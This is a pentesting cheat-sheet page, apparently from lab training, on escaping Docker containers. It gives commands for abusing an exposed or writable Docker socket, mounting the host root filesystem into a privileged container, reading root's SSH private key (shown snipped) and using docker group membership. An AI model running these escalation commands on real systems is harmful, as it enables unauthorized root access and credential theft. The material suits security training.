Pentesting docker

See docker.

https://www.panoptica.app/research/7-ways-to-escape-a-container

Docker Shared Directories

When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's filesystem. Shared directories can be mounted as read-only or read-write, depending on specific administrator requirements.

Enumerate  additional (non-standard) directories on the docker’s filesystem:

ls -la ~ 

Note, for instance if you have access to a .ssh folder.

Docker sockets

A Docker socket or Docker daemon socket is a special file that allows us and processes to communicate with the Docker daemon. It acts as a bridge, facilitating communication between the Docker client and the Docker daemon. When we issue a command through the Docker CLI, the Docker client sends the command to the Docker socket, and the Docker daemon, in turn, processes the command and carries out the requested actions.

By exposing the Docker socket over a network interface, we can remotely manage Docker hosts, issue commands, and control containers and other resources. This remote API access expands the possibilities for distributed Docker setups and remote management scenarios. However, depending on the configuration, there are many ways where automated processes or tasks can be stored. Those files can contain very useful information for us that we can use to escape the Docker container.

ls -al ~/app

Output:

total 8
drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
drwxr-xr-x 1 root        root        4096 Jun 30 15:12 ..
srw-rw---- 1 root        root           0 Jun 30 15:27 docker.soc

From here on, we can use the docker binary to interact with the socket and enumerate what docker containers are already running.

docker -H unix:///app/docker.sock ps

Abusing mapping to root directory

We can create our own Docker container that maps the host’s root directory (/) to the /hostsystem directory on the container. With this, we will get full access to the host system. Therefore, we must map these directories accordingly and use the main_app Docker image.

docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app

# And check running processes:
docker -H unix:///app/docker.sock ps

Output:

CONTAINER ID     IMAGE         COMMAND                 CREATED           STATUS           PORTS     NAMES
7ae3bcc818af     main_app      "/docker-entry.s..."    12 seconds ago    Up 8 seconds     443/tcp   app
3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago        Up 17 minutes    443/tcp   app
<SNIP>

Now, we can log in to the new privileged Docker container with the ID 7ae3bcc818af and navigate to the /hostsystem.

docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash

Output:

root@7ae3bcc818af:~# cat /hostsystem/root/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
<SNIP>

From there, we can again try to grab the private SSH key and log in as root or as any other user on the system with a private SSH key in its folder.

Abuse writable docker socket

A case that can also occur is when the Docker socket is writable. Usually, this socket is located in /var/run/docker.sock. However, the location can be different. Because basically, this can only be written by the root or docker group. If we act as a user, not in one of these two groups, and the Docker socket still has the privileges to be writable, then we can still use this case to escalate our privileges.

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

ls -la

Docker Group

To gain root privileges through Docker, the user we are logged in with must be in the docker group.

id

Output:

uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker)

Alternatively, Docker may have SUID set, or we are in the Sudoers file, which permits us to run docker as root.

To see which images exist and which we can access, we can use the following command:

docker image ls

Last update: 2025-02-16
Created: November 9, 2023 18:17:11